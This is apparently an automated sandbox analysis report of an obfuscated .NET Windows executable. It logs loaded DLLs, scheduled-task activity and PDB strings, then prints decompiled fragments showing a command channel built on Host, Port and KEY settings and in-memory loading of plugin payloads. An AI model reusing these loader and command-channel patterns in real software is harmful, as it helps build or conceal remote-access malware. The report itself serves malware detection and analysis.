              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: dwrite.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: textshaping.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: amsi.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: msasn1.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: gpapi.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: windowscodecs.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: propsys.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: edputil.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: iertutil.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: windows.staterepositoryps.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: wintypes.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: appresolver.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: bcp47langs.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: slc.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: sppc.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: dwrite.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: textshaping.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: amsi.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: msasn1.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: gpapi.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: windowscodecs.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: propsys.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: edputil.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: iertutil.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: windows.staterepositoryps.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: wintypes.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: appresolver.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: bcp47langs.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: slc.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: sppc.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: 9758xBqgE1azKnB.lnk.7.drLNK file: ..\..\..\..\..\9758xBqgE1azKnB.exe
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: 9758xBqgE1azKnB.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: 9758xBqgE1azKnB.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: 9758xBqgE1azKnB.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: C:\Windows\NHwE.pdbpdbHwE.pdb source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834781013.0000000006D70000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834152257.00000000063AA000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834781013.0000000006D9A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Xml.ni.pdb source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: System.Windows.Forms.pdbH source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834781013.0000000006D70000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\NHwE.pdb source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834781013.0000000006D70000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Accessibility.pdb source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: System.ni.pdbRSDS source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: System.Core.pdbAccessibility.dll8 source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: \??\C:\Windows\exe\NHwE.pdb source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834781013.0000000006D70000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\exe\NHwE.pdbu source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834781013.0000000006D70000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Configuration.ni.pdb source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: mscorlib.ni.pdbRSDS source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: System.Configuration.pdb source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: 9758xBqgE1azKnB.exe, 00000007.00000002.3824966064.0000000001507000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Xml.pdb source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: o.pdb source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834152257.00000000063AA000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.pdb source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: System.Xml.ni.pdbRSDS# source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: NHwE.pdbSHA256T source: 9758xBqgE1azKnB.exe, grjujyNaBLaKbU.exe.0.dr, 9758xBqgE1azKnB.exe.7.dr
              Source: Binary string: Microsoft.VisualBasic.pdb source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: System.Core.ni.pdb source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: n0C:\Windows\mscorlib.pdbj~ source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834152257.00000000063AA000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: %%.pdb source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834152257.00000000063AA000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.Windows.Forms.pdb source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: \??\C:\Windows\mscorlib.pdb% source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834781013.0000000006D70000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.pdb source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834152257.00000000063AA000.00000004.00000010.00020000.00000000.sdmp, 9758xBqgE1azKnB.exe, 00000007.00000002.3834781013.0000000006D70000.00000004.00000020.00020000.00000000.sdmp, 9758xBqgE1azKnB.exe, 00000007.00000002.3824966064.000000000156C000.00000004.00000020.00020000.00000000.sdmp, WER1BE7.tmp.dmp.28.dr
              Source: Binary string: NHwE.pdb source: 9758xBqgE1azKnB.exe, grjujyNaBLaKbU.exe.0.dr, 9758xBqgE1azKnB.exe.7.dr
              Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: 9758xBqgE1azKnB.exe, 00000007.00000002.3824966064.000000000152A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: oC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbD source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834152257.00000000063AA000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: System.Drawing.pdb source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: System.Management.pdb source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: mscorlib.ni.pdb source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: System.Management.ni.pdb source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: \??\C:\Windows\mscorlib.pdb source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834781013.0000000006D70000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: symbols\dll\mscorlib.pdbLb source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834152257.00000000063AA000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\exe\NHwE.pdb source: 9758xBqgE1azKnB.exe, 00000007.00000002.3834781013.0000000006D9A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: System.ni.pdb source: WER1BE7.tmp.dmp.28.dr
              Source: Binary string: System.Core.ni.pdbRSDS source: WER1BE7.tmp.dmp.28.dr

              Data Obfuscation

              barindex
              .NET source code contains method to dynamically call methods (often used by packers)
              Source: 0.2.9758xBqgE1azKnB.exe.30b13e0.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 0.2.9758xBqgE1azKnB.exe.30b13e0.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Helper.SB(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 0.2.9758xBqgE1azKnB.exe.30b13e0.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 0.2.9758xBqgE1azKnB.exe.30a8300.2.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 0.2.9758xBqgE1azKnB.exe.30a8300.2.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Helper.SB(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 0.2.9758xBqgE1azKnB.exe.30a8300.2.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 8.2.grjujyNaBLaKbU.exe.2bd2aa4.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 8.2.grjujyNaBLaKbU.exe.2bd2aa4.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Helper.SB(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 8.2.grjujyNaBLaKbU.exe.2bd2aa4.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 8.2.grjujyNaBLaKbU.exe.2bdbb84.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 8.2.grjujyNaBLaKbU.exe.2bdbb84.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Helper.SB(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 8.2.grjujyNaBLaKbU.exe.2bdbb84.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
              .NET source code contains potential unpacker
              Source: 0.2.9758xBqgE1azKnB.exe.7890000.5.raw.unpack, rw6rw0BnvthyGxjk5e.cs.Net Code: MTLR62MwZG System.Reflection.Assembly.Load(byte[])
              Source: 0.2.9758xBqgE1azKnB.exe.30b13e0.0.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
              Source: 0.2.9758xBqgE1azKnB.exe.30b13e0.0.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
              Source: 0.2.9758xBqgE1azKnB.exe.30b13e0.0.raw.unpack, Messages.cs.Net Code: Memory
              Source: 0.2.9758xBqgE1azKnB.exe.30a8300.2.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
              Source: 0.2.9758xBqgE1azKnB.exe.30a8300.2.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
              Source: 0.2.9758xBqgE1azKnB.exe.30a8300.2.raw.unpack, Messages.cs.Net Code: Memory
              Source: 0.2.9758xBqgE1azKnB.exe.4178690.3.raw.unpack, rw6rw0BnvthyGxjk5e.cs.Net Code: MTLR62MwZG System.Reflection.Assembly.Load(byte[])
              Source: 8.2.grjujyNaBLaKbU.exe.2bd2aa4.0.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
              Source: 8.2.grjujyNaBLaKbU.exe.2bd2aa4.0.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
              Source: 8.2.grjujyNaBLaKbU.exe.2bd2aa4.0.raw.unpack, Messages.cs.Net Code: Memory
              Source: 8.2.grjujyNaBLaKbU.exe.2bdbb84.1.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
              Source: 8.2.grjujyNaBLaKbU.exe.2bdbb84.1.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
              Source: 8.2.grjujyNaBLaKbU.exe.2bdbb84.1.raw.unpack, Messages.cs.Net Code: Memory
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exeCode function: 8_2_0820B913 push eax; retf 8_2_0820B91D
              Source: 9758xBqgE1azKnB.exeStatic PE information: section name: .text entropy: 7.9146348506405895
              Source: grjujyNaBLaKbU.exe.0.drStatic PE information: section name: .text entropy: 7.9146348506405895
              Source: 9758xBqgE1azKnB.exe.7.drStatic PE information: section name: .text entropy: 7.9146348506405895
              Source: 0.2.9758xBqgE1azKnB.exe.7890000.5.raw.unpack, lMrCMlzm8JgcqZan6j.csHigh entropy of concatenated method names: 'cA5oKnDeou', 'PWooPwXbF5', 'dpEolbbYJD', 'eLBoxlVPbE', 'BbIoYe9T5H', 'eWKopNAMS7', 'ft4o9T9e53', 'CeYohkSvPY', 'rPgoCNIZ9N', 'OoGoSdCcI7'
              Source: 0.2.9758xBqgE1azKnB.exe.7890000.5.raw.unpack, tP4sQN4ycAfk4RTrPD.csHigh entropy of concatenated method names: 'ptb625Gys', 'msnI2FQDZ', 'xFPKxJB28', 'CJq8FeOMM', 'DRNlYykf4', 'MFsAxwA8F', 'VHwMsZn5qaRXoBVEAV', 'QUFS8Ijmg4nd478XUT', 'gxVsjeR3b', 'CWIomyXBC'
              Source: 0.2.9758xBqgE1azKnB.exe.7890000.5.raw.unpack, EukKZG7BIlra3Zvh4J.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Tfb4fAm9st', 'fPH4HUvKcM', 'vt94zanV1I', 'p0KwLhOU8h', 'AWPwMyQ1hF', 'L4uw4rOZVE', 'jorwwc8JUv', 'EFC9ymNLxT8fLITSHdI'
              Source: 0.2.9758xBqgE1azKnB.exe.7890000.5.raw.unpack, bdaIPTyqCvhKkGvBZ0.csHigh entropy of concatenated method names: 'JVZtbeyfo8', 'fLHteXo97w', 'CkCttC4os1', 'L0etj9c8VZ', 'EogtGiHXPO', 'vijthM8355', 'Dispose', 'kLXsm2ZIfW', 'JrlsNQWJaE', 'j7ls7ZXlOp'
              Source: 0.2.9758xBqgE1azKnB.exe.7890000.5.raw.unpack, B2X6TIA6OwcjisGogX.csHigh entropy of concatenated method names: 'k2QqdjfgZ5', 'eLeq8Ftpnh', 'Jw97ikoIAC', 'i987pfwYMZ', 'vxu79ThvK9', 'bMJ7cynblv', 'K9d7OmOdpm', 'dmP73StVmr', 'XQc7g9wnpc', 'cIn7T1XoCF'
              Source: 0.2.9758xBqgE1azKnB.exe.7890000.5.raw.unpack, JPU6JeZEfcOAh3VAxw.csHigh entropy of concatenated method names: 'FMgbTXjbCK', 'uqZb1Vs1nh', 'SuDbZAuWsr', 'cfrbWkUplv', 'crYbYVOVeH', 'PdCbi5XQT8', 'qiEbpGCZsq', 'Etyb9QT1qs', 'XwNbc3fkbI', 'z89bOi6iXU'
              Source: 0.2.9758xBqgE1azKnB.exe.7890000.5.raw.unpack, BfRKGsxfmapLDnyJae.csHigh entropy of concatenated method names: 'MbSrafQdhs', 'WNYrNlajD9', 'JMUrqANN1W', 'OF1rkrPrwn', 'cGBrBHtKk2', 'CoYq58XgrI', 'aAnqEuqaSf', 'YQHqy03gBN', 'oC6qJSqequ', 'grPqfIOBvQ'
              Source: 0.2.9758xBqgE1azKnB.exe.7890000.5.raw.unpack, rw6rw0BnvthyGxjk5e.csHigh entropy of concatenated method names: 'KqpwaCvyRb', 'GdUwmRTqhL', 'sPIwNeNjTg', 'e7Zw75gqvZ', 'fONwq8WGVq', 'XRRwraVqAf', 'uILwk3RPMY', 'c0qwBpt8qH', 'cMewQjfnRs', 'jTvwvXj1jG'
              Source: 0.2.9758xBqgE1azKnB.exe.7890000.5.raw.unpack, G0rrHkR3Regm38HbYK.csHigh entropy of concatenated method names: 'hmRMkWu4X2', 'LSeMBE0Pxk', 'wAuMv3ak4X', 'UHnMu3d2X6', 'rGoMbgXKfR', 'BGsMnfmapL', 'RM4Zsa9v91jxrp3tyN', 'hy62Gm5BFHIFjtfOWS', 'DUNMMAYQlq', 'UXKMwmR6U4'
              Source: 0.2.9758xBqgE1azKnB.exe.7890000.5.raw.unpack, etnqG0M40RuYQ2CGjgs.csHigh entropy of concatenated method names: 'ToString', 'pYyjPN0WPl', 'Fn4jl9uRBK', 'H9njAaFHsF', 'ir7jx6YOxy', 'tPkjYgC6i8', 'LgXjiJGs3G', 'oPYjpUIa4S', 'X1FpvL0waeBwGC0jlB7', 'H9FsVx0GUf3cpEH2BN3'
